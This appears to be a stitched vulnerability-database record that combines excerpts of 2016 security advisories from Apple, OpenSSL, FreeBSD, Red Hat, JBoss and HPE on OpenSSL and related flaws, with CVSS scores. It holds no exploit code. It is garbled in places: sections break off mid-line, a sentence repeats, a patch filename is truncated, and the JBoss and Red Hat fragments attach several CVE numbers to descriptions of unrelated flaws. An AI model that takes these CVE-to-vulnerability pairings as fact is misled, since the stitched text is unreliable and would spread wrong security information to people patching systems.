UK\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may reveal a user\u0027s\ncurrent location\nDescription: An issue existed in the parsing of geolocation\nrequests. This was addressed through improved validation of the\nsecurity origin for geolocation requests. \nCVE-ID\nCVE-2016-1779 : xisigr of Tencent\u0027s Xuanwu Lab\n(http://www.tencent.com)\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may be able to access restricted ports\non arbitrary servers\nDescription: A port redirection issue was addressed through\nadditional port validation. \nCVE-ID\nCVE-2016-1782 : Muneaki Nishimura (nishimunea) of Recruit\nTechnologies Co.,Ltd. \n\nWebKit History\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted web content may lead to an\nunexpected Safari crash\nDescription: A resource exhaustion issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and \u674e\u666e\u541b of\n\u65e0\u58f0\u4fe1\u606f\u6280\u672fPKAV Team (PKAV.net)\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: Redirect responses may have allowed a malicious website\nto display an arbitrary URL and read cached contents of the\ndestination origin. This issue was addressed through improved URL\ndisplay logic. \nCVE-ID\nCVE-2016-1786 : ma.la of LINE Corporation\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may exfiltrate data cross-origin\nDescription: A caching issue existed with character encoding. This\nwas addressed through additional request checking. \nCVE-ID\nCVE-2016-1785 : an anonymous researcher\n\nWi-Fi\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update\nwill be \"9.3 \". \n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JPyAAoJEBcWfLTuOo7tWzQP/i8AwdkoE9uvhfe5X5p1yDxr\nYVcAkvHAgWzNee9Tvc6ERa2KWdOkmbVRGzySyG62lhGnrUTSMtlCs0/Bp/Ui5p65\nFF2viREhDJNA83WZcsFP0ELZVJ5VwUv6BJR0L0ERn7QSfaftAwVSFmyHHURA7rGj\nIRQWnwD6IOblI0veLXjJjN8nPY2ueAzVvyv5mD8c4MdCxwxZNi2X9ugtIBBbZr6Y\narjAVh/wfB0m+f50feDaPvo/8mZDn1UwrDu0YPtGDmGebgX17TE39q0YgOFf0uXv\nHzA0S1+mDURGR3h+7wpyO25+uOPHyGkeIA1GVISA2O7pmHKTcY5pvWC4zyIsDfRC\nziI4AIml9ySY7nIltuUWeUdO81nHrjvEtXyWZ6VBH4Dah4yne80B04UGgLIzD1ON\nhTlTySVnMBJ8+N0g+e3ldGTuf49ISEKh9s6u+ABtBi9+sDSiWxGIkvNuZN37522O\ndK4MsAZIffxbKo2DuJxiWrfIzhAOO3rZbRD8oFkOtKh5QHlS1eOBlN29U9S1Cq+P\njZ/sffscri8q9m8KUx4a+1HG3N6TDIJtIz7/jJyTld2Aw+1JAlU4DG41t1lkEs6S\n41wah3j9YrqXCp2uc3JmcI6k2XW2pj73T9Mqqz5e/xk2sfwnJ299dAK7vXkGR3ix\nFg29LzTb0eQ9Ub1Mkn5E\n=Ouex\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7500"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006435"
},
{
"db": "BID",
"id": "79562"
},
{
"db": "VULHUB",
"id": "VHN-85461"
},
{
"db": "VULMON",
"id": "CVE-2015-7500"
},
{
"db": "PACKETSTORM",
"id": "137101"
},
{
"db": "PACKETSTORM",
"id": "135395"
},
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VAR-201605-0076
Vulnerability from variot - Updated: 2026-04-10 23:29Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data. OpenSSL is prone to an integer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Following product versions are affected: OpenSSL versions 1.0.2 prior to 1.0.2h are vulnerable. OpenSSL versions 1.0.1 prior to 1.0.1t are vulnerable. OpenSSL Security Advisory [3rd May 2016] ========================================
Memory corruption in the ASN.1 encoder (CVE-2016-2108)
Severity: High
This issue affected versions of OpenSSL prior to April 2015. The bug causing the vulnerability was fixed on April 18th 2015, and released as part of the June 11th 2015 security releases. The security impact of the bug was not known at the time.
In previous versions of OpenSSL, ASN.1 encoding the value zero represented as a negative integer can cause a buffer underflow with an out-of-bounds write in i2c_ASN1_INTEGER. The ASN.1 parser does not normally create "negative zeroes" when parsing ASN.1 input, and therefore, an attacker cannot trigger this bug.
However, a second, independent bug revealed that the ASN.1 parser (specifically, d2i_ASN1_TYPE) can misinterpret a large universal tag as a negative zero value. Large universal tags are not present in any common ASN.1 structures (such as X509) but are accepted as part of ANY structures.
Therefore, if an application deserializes untrusted ASN.1 structures containing an ANY field, and later reserializes them, an attacker may be able to trigger an out-of-bounds write. This has been shown to cause memory corruption that is potentially exploitable with some malloc implementations.
Applications that parse and re-encode X509 certificates are known to be vulnerable. Applications that verify RSA signatures on X509 certificates may also be vulnerable; however, only certificates with valid signatures trigger ASN.1 re-encoding and hence the bug. Specifically, since OpenSSL's default TLS X509 chain verification code verifies the certificate chain from root to leaf, TLS handshakes could only be targeted with valid certificates issued by trusted Certification Authorities.
OpenSSL 1.0.2 users should upgrade to 1.0.2c OpenSSL 1.0.1 users should upgrade to 1.0.1o
This vulnerability is a combination of two bugs, neither of which individually has security impact. The first bug (mishandling of negative zero integers) was reported to OpenSSL by Huzaifa Sidhpurwala (Red Hat) and independently by Hanno Böck in April 2015. The second issue (mishandling of large universal tags) was found using libFuzzer, and reported on the public issue tracker on March 1st 2016. The fact that these two issues combined present a security vulnerability was reported by David Benjamin (Google) on March 31st 2016. The fixes were developed by Steve Henson of the OpenSSL development team, and David Benjamin. The OpenSSL team would also like to thank Mark Brand and Ian Beer from the Google Project Zero team for their careful analysis of the impact.
The fix for the "negative zero" memory corruption bug can be identified by commits
3661bb4e7934668bd99ca777ea8b30eedfafa871 (1.0.2) and 32d3b0f52f77ce86d53f38685336668d47c5bdfe (1.0.1)
Padding oracle in AES-NI CBC MAC check (CVE-2016-2107)
Severity: High
A MITM attacker can use a padding oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server support AES-NI.
This issue was introduced as part of the fix for Lucky 13 padding attack (CVE-2013-0169). The padding check was rewritten to be in constant time by making sure that always the same bytes are read and compared against either the MAC or padding bytes. But it no longer checked that there was enough data to have both the MAC and padding bytes.
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 13th of April 2016 by Juraj Somorovsky using TLS-Attacker. The fix was developed by Kurt Roeckx of the OpenSSL development team.
EVP_EncodeUpdate overflow (CVE-2016-2105)
Severity: Low
An overflow can occur in the EVP_EncodeUpdate() function which is used for Base64 encoding of binary data.
Internally to OpenSSL the EVP_EncodeUpdate() function is primarly used by the PEM_write_bio family of functions. These are mainly used within the OpenSSL command line applications. These internal uses are not considered vulnerable because all calls are bounded with length checks so no overflow is possible. User applications that call these APIs directly with large amounts of untrusted data may be vulnerable. (Note: Initial analysis suggested that the PEM_write_bio were vulnerable, and this is reflected in the patch commit message. This is no longer believed to be the case).
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 3rd March 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
EVP_EncryptUpdate overflow (CVE-2016-2106)
Severity: Low
An overflow can occur in the EVP_EncryptUpdate() function. Following an analysis of all OpenSSL internal usage of the EVP_EncryptUpdate() function all usage is one of two forms. The first form is where the EVP_EncryptUpdate() call is known to be the first called function after an EVP_EncryptInit(), and therefore that specific call must be safe. The second form is where the length passed to EVP_EncryptUpdate() can be seen from the code to be some small value and therefore there is no possibility of an overflow. Since all instances are one of these two forms, it is believed that there can be no overflows in internal code due to this problem. It should be noted that EVP_DecryptUpdate() can call EVP_EncryptUpdate() in certain code paths. Also EVP_CipherUpdate() is a synonym for EVP_EncryptUpdate(). All instances of these calls have also been analysed too and it is believed there are no instances in internal usage where an overflow could occur.
This could still represent a security issue for end user code that calls this function directly.
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 3rd March 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
ASN.1 BIO excessive memory allocation (CVE-2016-2109)
Severity: Low
When ASN.1 data is read from a BIO using functions such as d2i_CMS_bio() a short invalid encoding can casuse allocation of large amounts of memory potentially consuming excessive resources or exhausting memory.
Any application parsing untrusted data through d2i BIO functions is affected. The memory based functions such as d2i_X509() are not affected. Since the memory based functions are used by the TLS library, TLS applications are not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 4th April 2016 by Brian Carpenter. The fix was developed by Stephen Henson of the OpenSSL development team.
EBCDIC overread (CVE-2016-2176)
Severity: Low
ASN1 Strings that are over 1024 bytes can cause an overread in applications using the X509_NAME_oneline() function on EBCDIC systems. This could result in arbitrary stack data being returned in the buffer.
OpenSSL 1.0.2 users should upgrade to 1.0.2h OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 5th March 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160503.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html . Corrected: 2016-05-03 18:54:20 UTC (stable/10, 10.3-STABLE) 2016-05-04 15:25:47 UTC (releng/10.3, 10.3-RELEASE-p2) 2016-05-04 15:26:23 UTC (releng/10.2, 10.2-RELEASE-p16) 2016-05-04 15:27:09 UTC (releng/10.1, 10.1-RELEASE-p33) 2016-05-04 06:53:02 UTC (stable/9, 9.3-STABLE) 2016-05-04 15:27:09 UTC (releng/9.3, 9.3-RELEASE-p41) CVE Name: CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2109, CVE-2016-2176
For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . Background
FreeBSD includes software from the OpenSSL Project.
II. [CVE-2016-2176] FreeBSD does not run on any EBCDIC systems and therefore is not affected.
III.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
Restart all daemons that use the library, or reboot the system.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
Restart all daemons that use the library, or reboot the system.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.x]
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch.asc
gpg --verify openssl-10.patch.asc
[FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patc
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patch.asc
gpg --verify openssl-9.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as described in .
Restart all daemons that use the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/9/ r299053 releng/9.3/ r299068 stable/10/ r298999 releng/10.1/ r299068 releng/10.2/ r299067 releng/10.3/ r299066
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. 6) - i386, x86_64
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:0722-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0722.html Issue date: 2016-05-09 CVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2842 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 7. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. (CVE-2016-2105, CVE-2016-2106)
-
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when the connection used the AES CBC cipher suite and the server supported AES-NI. A remote attacker could possibly use this flaw to retrieve plain text from encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-0799, CVE-2016-2842)
-
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. (CVE-2016-2109)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, and CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Böck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as the original reporter of CVE-2016-2107.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.5.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.5.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm openssl-devel-1.0.1e-51.el7_2.5.s390.rpm openssl-devel-1.0.1e-51.el7_2.5.s390x.rpm openssl-libs-1.0.1e-51.el7_2.5.s390.rpm openssl-libs-1.0.1e-51.el7_2.5.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.5.ppc64.rpm openssl-static-1.0.1e-51.el7_2.5.ppc.rpm openssl-static-1.0.1e-51.el7_2.5.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.5.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm openssl-perl-1.0.1e-51.el7_2.5.s390x.rpm openssl-static-1.0.1e-51.el7_2.5.s390.rpm openssl-static-1.0.1e-51.el7_2.5.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0799 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2107 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-2842 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXMFlTXlSAg2UNWIIRAhYAAJ0T9Ib2vXUa5te34i6fphHrbe0HlwCfePy5 WjaK8x9OaI0FgbWyfxvwq6o= =jHjh -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. This could lead to a heap corruption. This could lead to a heap corruption.
CVE-2016-2108
David Benjamin from Google discovered that two separate bugs in the
ASN.1 encoder, related to handling of negative zero integer values
and large universal tags, could lead to an out-of-bounds write.
For the unstable distribution (sid), these problems have been fixed in version 1.0.2h-1. Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.
This release includes bug fixes and enhancements, as well as a new release of OpenSSL that addresses a number of outstanding security flaws. For further information, see the knowledge base article linked to in the References section. The JBoss server process must be restarted for the update to take effect. (CVE-2016-2108)
-
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3195)
-
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic. (CVE-2016-2106)
-
It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). (CVE-2016-2109)
-
It was discovered that specifying configuration with a JVMRoute path longer than 80 characters will cause segmentation fault leading to a server crash. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05320149
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05320149 Version: 1
HPSBMU03653 rev.1 - HPE System Management Homepage (SMH), Remote Arbitrary Code Execution, Cross-Site Scripting (XSS), Denial of Service (DoS), Unauthorized Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-10-26 Last Updated: 2016-10-26
Potential Security Impact: Remote: Arbitrary Code Execution, Cross-Site Scripting (XSS), Denial of Service (DoS), Unauthorized Disclosure of Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Multiple potential security vulnerabilities have been identified in HPE System Management Homepage (SMH) on Windows and Linux. The vulnerabilities could be remotely exploited using man-in-the-middle (MITM) attacks resulting in cross-site scripting (XSS), arbitrary code execution, Denial of Service (DoS), and/or unauthorized disclosure of information.
References:
- CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information
- CVE-2016-2106 - OpenSSL, Denial of Service (DoS)
- CVE-2016-2109 - OpenSSL, Denial of Service (DoS)
- CVE-2016-2105 - OpenSSL, Denial of Service (DoS)
- CVE-2016-3739 - cURL and libcurl, Remote code execution
- CVE-2016-5388 - "HTTPoxy", Apache Tomcat
- CVE-2016-5387 - "HTTPoxy", Apache HTTP Server
- CVE-2016-5385 - "HTTPoxy", PHP
- CVE-2016-4543 - PHP, multiple impact
- CVE-2016-4071 - PHP, multiple impact
- CVE-2016-4072 - PHP, multiple impact
- CVE-2016-4542 - PHP, multiple impact
- CVE-2016-4541 - PHP, multiple impact
- CVE-2016-4540 - PHP, multiple impact
- CVE-2016-4539 - PHP, multiple impact
- CVE-2016-4538 - PHP, multiple impact
- CVE-2016-4537 - PHP, multiple impact
- CVE-2016-4343 - PHP, multiple impact
- CVE-2016-4342 - PHP, multiple impact
- CVE-2016-4070 - PHP, Denial of Service (DoS)
- CVE-2016-4393 - PSRT110263, XSS vulnerability
- CVE-2016-4394 - PSRT110263, HSTS vulnerability
- CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow
- CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow
- PSRT110145
- PSRT110263
- PSRT110115
- PSRT110116
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HPE System Management Homepage - all versions prior to v7.6
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-2105
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2106
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2107
5.9 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVE-2016-2109
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2016-3739
5.3 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N
2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
CVE-2016-4070
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-4071
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4072
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4342
8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.3 (AV:N/AC:M/Au:N/C:P/I:P/A:C)
CVE-2016-4343
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2016-4393
4.2 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N
4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)
CVE-2016-4394
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CVE-2016-4395
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)
CVE-2016-4396
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)
CVE-2016-4537
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
